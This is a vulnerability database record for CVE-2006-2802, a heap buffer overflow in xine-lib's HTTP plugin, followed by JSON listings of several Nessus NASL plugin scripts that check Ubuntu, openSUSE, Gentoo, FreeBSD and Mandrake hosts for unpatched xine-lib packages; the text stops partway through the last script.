ID CVE-2006-2802 Type cve Reporter NVD Modified 2018-10-03T17:43:00
Description
Buffer overflow in the HTTP Plugin (xineplug_inp_http.so) for xine-lib 1.1.1 allows remote attackers to cause a denial of service (application crash) via a long reply from an HTTP server, as demonstrated using gxine 0.5.6.
{"nessus": [{"lastseen": "2019-01-16T20:07:43", "bulletinFamily": "scanner", "description": "Federico L. Bossi Bonin discovered a buffer overflow in the HTTP input\nmodule. By tricking an user into opening a malicious remote media\nlocation, a remote attacker could exploit this to crash Xine library\nfrontends (like totem-xine, gxine, or xine-ui) and possibly even\nexecute arbitrary code with the user's privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2018-12-01T00:00:00", "published": "2007-11-10T00:00:00", "id": "UBUNTU_USN-295-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=27867", "title": "Ubuntu 5.04 / 5.10 / 6.06 LTS : xine-lib vulnerability (USN-295-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-295-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(27867);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/12/01 15:12:38\");\n\n script_cve_id(\"CVE-2006-2802\");\n script_xref(name:\"USN\", value:\"295-1\");\n\n script_name(english:\"Ubuntu 5.04 / 5.10 / 6.06 LTS : xine-lib vulnerability (USN-295-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Federico L. Bossi Bonin discovered a buffer overflow in the HTTP input\nmodule. By tricking an user into opening a malicious remote media\nlocation, a remote attacker could exploit this to crash Xine library\nfrontends (like totem-xine, gxine, or xine-ui) and possibly even\nexecute arbitrary code with the user's privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/295-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libxine-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libxine-main1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libxine1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libxine1c2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2007-2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(5\\.04|5\\.10|6\\.06)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 5.04 / 5.10 / 6.06\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libxine-dev\", pkgver:\"1.0-1ubuntu3.7\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libxine1\", pkgver:\"1.0-1ubuntu3.7\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libxine-dev\", pkgver:\"1.0.1-1ubuntu10.3\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libxine1c2\", pkgver:\"1.0.1-1ubuntu10.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libxine-dev\", pkgver:\"1.1.1+ubuntu2-7.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libxine-main1\", pkgver:\"1.1.1+ubuntu2-7.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxine-dev / libxine-main1 / libxine1 / libxine1c2\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:07:38", "bulletinFamily": "scanner", "description": "Missing length checks in the HTTP plugin could lead to a buffer\noverflow on the heap (CVE-2006-2802).", "modified": "2018-07-19T00:00:00", "published": "2007-10-17T00:00:00", "id": "SUSE_XINE-LIB-1599.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=27484", "title": "openSUSE 10 Security Update : xine-lib (xine-lib-1599)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update xine-lib-1599.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(27484);\n script_version (\"1.9\");\n script_cvs_date(\"Date: 2018/07/19 23:54:24\");\n\n script_cve_id(\"CVE-2006-2802\");\n\n script_name(english:\"openSUSE 10 Security Update : xine-lib (xine-lib-1599)\");\n script_summary(english:\"Check for the xine-lib-1599 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Missing length checks in the HTTP plugin could lead to a buffer\noverflow on the heap (CVE-2006-2802).\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xine-lib packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xine-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xine-lib-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.1\", reference:\"xine-lib-1.1.1-24.6\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", cpu:\"x86_64\", reference:\"xine-lib-32bit-1.1.1-24.6\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xine-lib / xine-lib-32bit\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:06:49", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-200609-08\n(xine-lib: Buffer overflows)\n\n xine-lib contains buffer overflows in the processing of AVI.\n Additionally, xine-lib is vulnerable to a buffer overflow in the HTTP\n plugin (xineplug_inp_http.so) via a long reply from an HTTP server.\nImpact :\n\n An attacker could trigger the buffer overflow vulnerabilities by\n enticing a user to load a specially crafted AVI file in xine. This\n might result in the execution of arbitrary code with the rights of the\n user running xine. Additionally, a remote HTTP server serving a xine\n client a specially crafted reply could crash xine and possibly execute\n arbitrary code.\nWorkaround :\n\n There is no known workaround at this time.", "modified": "2018-07-11T00:00:00", "published": "2006-09-15T00:00:00", "id": "GENTOO_GLSA-200609-08.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22353", "title": "GLSA-200609-08 : xine-lib: Buffer overflows", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200609-08.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22353);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/07/11 17:09:25\");\n\n script_cve_id(\"CVE-2006-2802\");\n script_bugtraq_id(18187);\n script_xref(name:\"GLSA\", value:\"200609-08\");\n\n script_name(english:\"GLSA-200609-08 : xine-lib: Buffer overflows\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200609-08\n(xine-lib: Buffer overflows)\n\n xine-lib contains buffer overflows in the processing of AVI.\n Additionally, xine-lib is vulnerable to a buffer overflow in the HTTP\n plugin (xineplug_inp_http.so) via a long reply from an HTTP server.\n \nImpact :\n\n An attacker could trigger the buffer overflow vulnerabilities by\n enticing a user to load a specially crafted AVI file in xine. This\n might result in the execution of arbitrary code with the rights of the\n user running xine. Additionally, a remote HTTP server serving a xine\n client a specially crafted reply could crash xine and possibly execute\n arbitrary code.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200609-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All xine-lib users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-libs/xine-lib-1.1.2-r2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:xine-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/09/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/09/15\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-libs/xine-lib\", unaffected:make_list(\"ge 1.1.2-r2\"), vulnerable:make_list(\"lt 1.1.2-r2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xine-lib\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:06:39", "bulletinFamily": "scanner", "description": "A Secunia Advisory reports :\n\nFederico L. Bossi Bonin has discovered a weakness in xine-lib, which\ncan be exploited by malicious people to crash certain applications on\na user's system.\n\nThe weakness is cause due to a heap corruption within the\n'xineplug_inp_http.so' plugin when handling an overly large reply from\nthe HTTP server. This can be exploited to crash an application that\nuses the plugin (e.g. gxine).", "modified": "2018-11-10T00:00:00", "published": "2006-06-16T00:00:00", "id": "FREEBSD_PKG_107E2EE5F94111DAB1FA020039488E34.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=21700", "title": "FreeBSD : libxine -- buffer overflow vulnerability (107e2ee5-f941-11da-b1fa-020039488e34)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21700);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/11/10 11:49:40\");\n\n script_cve_id(\"CVE-2006-2802\");\n script_bugtraq_id(18187);\n script_xref(name:\"Secunia\", value:\"20369\");\n\n script_name(english:\"FreeBSD : libxine -- buffer overflow vulnerability (107e2ee5-f941-11da-b1fa-020039488e34)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A Secunia Advisory reports :\n\nFederico L. Bossi Bonin has discovered a weakness in xine-lib, which\ncan be exploited by malicious people to crash certain applications on\na user's system.\n\nThe weakness is cause due to a heap corruption within the\n'xineplug_inp_http.so' plugin when handling an overly large reply from\nthe HTTP server. This can be exploited to crash an application that\nuses the plugin (e.g. gxine).\"\n );\n # https://vuxml.freebsd.org/freebsd/107e2ee5-f941-11da-b1fa-020039488e34.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e8055024\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:libxine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/06/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/06/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"libxine<1.1.1_6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:06:39", "bulletinFamily": "scanner", "description": "A buffer overflow in the HTTP Plugin (xineplug_inp_http.so) for\nxine-lib 1.1.1 allows remote attackers to cause a denial of service\n(application crash) via a long reply from an HTTP server, as\ndemonstrated using gxine 0.5.6. (CVE-2006-2802)\n\nIn addition, a possible buffer overflow exists in the AVI demuxer,\nsimilar in nature to CVE-2006-1502 for MPlayer. The Corporate 3\nrelease of xine-lib does not have this issue.\n\nThe updated packages have been patched to correct these issues.", "modified": "2018-07-19T00:00:00", "published": "2006-06-24T00:00:00", "id": "MANDRAKE_MDKSA-2006-108.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=21752", "title": "Mandrake Linux Security Advisory : xine-lib (MDKSA-2006:108)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2006:108. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21752);\n script_version (\"1.16\");\n script_cvs_date(\"Date: 2018/07/19 20:59:14\");\n\n script_cve_id(\"CVE-2006-2802\");\n script_bugtraq_id(18187);\n script_xref(name:\"MDKSA\", value:\"2006:108\");\n\n script_name(english:\"Mandrake Linux Security Advisory : xine-lib (MDKSA-2006:108)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow in the HTTP Plugin (xineplug_inp_http.so) for\nxine-lib 1.1.1 allows remote attackers to cause a denial of service\n(application crash) via a long reply from an HTTP server, as\ndemonstrated using gxine 0.5.6. (CVE-2006-2802)\n\nIn addition, a possible buffer overflow exists in the AVI demuxer,\nsimilar in nature to CVE-2006-1502 for MPlayer. The Corporate 3\nrelease of xine-lib does not have this issue.\n\nThe updated packages have been patched to correct these issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64xine1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64xine1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libxine1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libxine1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xine-aa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xine-arts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xine-dxr3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xine-esd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xine-flac\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xine-gnomevfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xine-image\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xine-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xine-polyp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xine-smb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2006\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:mandrakesoft:mandrake_linux:le2005\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/06/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/06/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK10.2\", cpu:\"x86_64\", reference:\"lib64xine1-1.0-8.3.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", cpu:\"x86_64\", reference:\"lib64xine1-devel-1.0-8.3.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", cpu:\"i386\", reference:\"libxine1-1.0-8.3.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", cpu:\"i386\", reference:\"libxine1-devel-1.0-8.3.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"xine-aa-1.0-8.3.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"xine-arts-1.0-8.3.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"xine-dxr3-1.0-8.3.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"xine-esd-1.0-8.3.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"xine-flac-1.0-8.3.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"xine-gnomevfs-1.0-8.3.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"xine-plugins-1.0-8.3.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"xine-polyp-1.0-8.3.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"xine-smb-1.0-8.3.102mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK2006.0\", cpu:\"x86_64\", reference:\"lib64xine1-1.1.0-9.3.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"x86_64\", reference:\"lib64xine1-devel-1.1.0-9.3.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"i386\", reference:\"libxine1-1.1.0-9.3.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"i386\", reference:\"libxine1-devel-1.1.0-9.3.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"xine-aa-1.1.0-9.3.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"xine-arts-1.1.0-9.3.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"xine-dxr3-1.1.0-9.3.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"xine-esd-1.1.0-9.3.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"xine-flac-1.1.0-9.3.20060mdk\", yank:\"mdk\")) flag++;\nif 